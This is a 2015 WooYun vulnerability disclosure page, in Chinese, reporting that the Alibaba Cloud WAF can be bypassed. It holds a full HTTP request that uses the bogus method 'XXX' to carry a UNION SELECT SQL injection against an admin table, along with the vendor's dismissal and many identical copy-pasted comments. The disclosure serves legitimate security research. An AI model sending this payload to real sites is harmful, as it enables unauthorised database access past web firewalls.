当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0104708

漏洞标题:alictf后遗症之阿里云waf绕过漏洞

相关厂商:阿里巴巴

漏洞作者: 路人甲

提交时间:2015-03-30 12:35

修复时间:2015-03-30 13:13

公开时间:2015-03-30 13:13

漏洞类型:设计缺陷/逻辑错误

危害等级:中

自评Rank:5

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-03-30: 细节已通知厂商并且等待厂商处理中
2015-03-30: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

alictf后遗症

详细说明:

构造特殊的http请求包绕过

漏洞证明:

修改http请求头

XXX /test.php?id=1%20union%20select%201,2,3,4,5%20from%20admin HTTP/1.1
Host: hostname
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:36.0) Gecko/20100101 Firefox/36.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive


testtest.png

修复方案:

北北来修复

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-03-30 13:13

厂商回复:

亲,经过测试未发现对系统造成影响,不是安全漏洞。感谢你对我们的支持与关注。

最新状态:

暂无

漏洞评价:

评论

  1. 2015-03-30 13:39 | 猪头 ( 路人 | Rank:8 漏洞数:1 | 窝才不萌萝莉呢~~~~(>_<)~~~~ 窝才不会卖萌...)

    黑哥,你们不是在帮助别人,是在帮助自己。我也不是在寻求帮助,我是在指导你以及类似的公司,明白么?我们俩不用讨论了,思维不在一个层面。我需要写一个文章描述一下,但是没有时间。能够做到更大的公司,是要切实的帮助客户、潜在客户解决问题,你是在帮助你自己。@sz冷焰 这块做得还不错。

  2. 2015-03-30 13:40 | 存在敏感词 ( 实习白帽子 | Rank:66 漏洞数:9 | 昵称存在敏感词)

    黑哥,你们不是在帮助别人,是在帮助自己。我也不是在寻求帮助,我是在指导你以及类似的公司,明白么?我们俩不用讨论了,思维不在一个层面。我需要写一个文章描述一下,但是没有时间。能够做到更大的公司,是要切实的帮助客户、潜在客户解决问题,你是在帮助你自己。@sz冷焰 这块做得还不错。

  3. 2015-03-30 13:40 | conqu3r ( 普通白帽子 | Rank:156 漏洞数:21 | 没有思想,没有道德,没有自由,没有人权的...)

    黑哥,你们不是在帮助别人,是在帮助自己。我也不是在寻求帮助,我是在指导你以及类似的公司,明白么?我们俩不用讨论了,思维不在一个层面。我需要写一个文章描述一下,但是没有时间。能够做到更大的公司,是要切实的帮助客户、潜在客户解决问题,你是在帮助你自己。@sz冷焰 这块做得还不错。

  4. 2015-03-30 13:41 | hey_man ( 路人 | Rank:8 漏洞数:2 | A man)

    黑哥,你们不是在帮助别人,是在帮助自己。我也不是在寻求帮助,我是在指导你以及类似的公司,明白么?我们俩不用讨论了,思维不在一个层面。我需要写一个文章描述一下,但是没有时间。能够做到更大的公司,是要切实的帮助客户、潜在客户解决问题,你是在帮助你自己。@sz冷焰 这块做得还不错。

  5. 2015-03-30 13:41 | 屎蛋 ( 路人 | Rank:8 漏洞数:2 | boom)

    黑哥,你们不是在帮助别人,是在帮助自己。我也不是在寻求帮助,我是在指导你以及类似的公司,明白么?我们俩不用讨论了,思维不在一个层面。我需要写一个文章描述一下,但是没有时间。能够做到更大的公司,是要切实的帮助客户、潜在客户解决问题,你是在帮助你自己。@sz冷焰 这块做得还不错。

  6. 2015-03-30 13:44 | lsh4ck ( 实习白帽子 | Rank:81 漏洞数:14 | 不是黑客!但是黑客手段都要会?)

    黑哥,你们不是在帮助别人,是在帮助自己。我也不是在寻求帮助,我是在指导你以及类似的公司,明白么?我们俩不用讨论了,思维不在一个层面。我需要写一个文章描述一下,但是没有时间。能够做到更大的公司,是要切实的帮助客户、潜在客户解决问题,你是在帮助你自己。@sz冷焰 这块做得还不错。

  7. 2015-03-30 13:47 | redrain有节操 ( 普通白帽子 | Rank:183 漏洞数:26 | ztz这下子有165了!>_<'/&\)

    黑哥,你们不是在帮助别人,是在帮助自己。我也不是在寻求帮助,我是在指导你以及类似的公司,明白么?我们俩不用讨论了,思维不在一个层面。我需要写一个文章描述一下,但是没有时间。能够做到更大的公司,是要切实的帮助客户、潜在客户解决问题,你是在帮助你自己。@sz冷焰 这块做得还不错。

  8. 2015-03-30 13:50 | hqdvista ( 普通白帽子 | Rank:154 漏洞数:31 | N/A)

    黑哥,你们不是在帮助别人,是在帮助自己。我也不是在寻求帮助,我是在指导你以及类似的公司,明白么?我们俩不用讨论了,思维不在一个层面。我需要写一个文章描述一下,但是没有时间。能够做到更大的公司,是要切实的帮助客户、潜在客户解决问题,你是在帮助你自己。@sz冷焰 这块做得还不错。

  9. 2015-03-30 13:53 | blackexp ( 实习白帽子 | Rank:36 漏洞数:13 | 一点一点的渗透到...)

    黑哥,你们不是在帮助别人,是在帮助自己。我也不是在寻求帮助,我是在指导你以及类似的公司,明白么?我们俩不用讨论了,思维不在一个层面。我需要写一个文章描述一下,但是没有时间。能够做到更大的公司,是要切实的帮助客户、潜在客户解决问题,你是在帮助你自己。@sz冷焰 这块做得还不错。

  10. 2015-03-30 15:04 | erevus ( 普通白帽子 | Rank:177 漏洞数:31 | Hacked by @ringzero 我錯了)

    黑哥,你们不是在帮助别人,是在帮助自己。我也不是在寻求帮助,我是在指导你以及类似的公司,明白么?我们俩不用讨论了,思维不在一个层面。我需要写一个文章描述一下,但是没有时间。能够做到更大的公司,是要切实的帮助客户、潜在客户解决问题,你是在帮助你自己。@sz冷焰 这块做得还不错。

  11. 2015-03-30 15:15 | roker ( 普通白帽子 | Rank:357 漏洞数:108 )

    黑哥,你们不是在帮助别人,是在帮助自己。我也不是在寻求帮助,我是在指导你以及类似的公司,明白么?我们俩不用讨论了,思维不在一个层面。我需要写一个文章描述一下,但是没有时间。能够做到更大的公司,是要切实的帮助客户、潜在客户解决问题,你是在帮助你自己。@sz冷焰 这块做得还不错。

  12. 2015-03-30 16:24 | Honker红颜 ( 普通白帽子 | Rank:156 漏洞数:51 | 皖南人士,90后宅男,自学成才,天朝教育失败....)

    黑哥,你们不是在帮助别人,是在帮助自己。我也不是在寻求帮助,我是在指导你以及类似的公司,明白么?我们俩不用讨论了,思维不在一个层面。我需要写一个文章描述一下,但是没有时间。能够做到更大的公司,是要切实的帮助客户、潜在客户解决问题,你是在帮助你自己。@sz冷焰 这块做得还不错。

  13. 2015-03-30 16:25 | 玉林嘎 ( 普通白帽子 | Rank:758 漏洞数:96 )

    黑哥,你们不是在帮助别人,是在帮助自己。我也不是在寻求帮助,我是在指导你以及类似的公司,明白么?我们俩不用讨论了,思维不在一个层面。我需要写一个文章描述一下,但是没有时间。能够做到更大的公司,是要切实的帮助客户、潜在客户解决问题,你是在帮助你自己。@sz冷焰 这块做得还不错。

  14. 2015-03-30 16:29 | 小胖子 认证白帽子 ( 核心白帽子 | Rank:1727 漏洞数:140 | 如果大海能够带走我的矮丑...)

    黑哥,你们不是在帮助别人,是在帮助自己。我也不是在寻求帮助,我是在指导你以及类似的公司,明白么?我们俩不用讨论了,思维不在一个层面。我需要写一个文章描述一下,但是没有时间。能够做到更大的公司,是要切实的帮助客户、潜在客户解决问题,你是在帮助你自己。@sz冷焰 这块做得还不错。

  15. 2015-03-30 16:55 | 杀器王子 认证白帽子 ( 普通白帽子 | Rank:1532 漏洞数:121 | 磨刀霍霍向猪羊)

    黑哥,你们不是在帮助别人,是在帮助自己。我也不是在寻求帮助,我是在指导你以及类似的公司,明白么?我们俩不用讨论了,思维不在一个层面。我需要写一个文章描述一下,但是没有时间。能够做到更大的公司,是要切实的帮助客户、潜在客户解决问题,你是在帮助你自己。@sz冷焰 这块做得还不错。

  16. 2015-03-30 17:07 | se55i0n ( 普通白帽子 | Rank:1567 漏洞数:173 )

    黑哥,你们不是在帮助别人,是在帮助自己。我也不是在寻求帮助,我是在指导你以及类似的公司,明白么?我们俩不用讨论了,思维不在一个层面。我需要写一个文章描述一下,但是没有时间。能够做到更大的公司,是要切实的帮助客户、潜在客户解决问题,你是在帮助你自己。@sz冷焰 这块做得还不错。

  17. 2015-03-30 18:02 | BMa ( 普通白帽子 | Rank:1776 漏洞数:200 )

    以前腾讯有过一个

  18. 2015-03-30 18:27 | qhwlpg ( 普通白帽子 | Rank:226 漏洞数:54 | 潜心代码审计。)

    很奇怪,为啥不防。。

  19. 2015-08-05 17:37 | 刘海哥 ( 普通白帽子 | Rank:114 漏洞数:28 | 索要联系方式但不送礼物的厂商定义为无良厂...)

    很奇怪,为啥不防。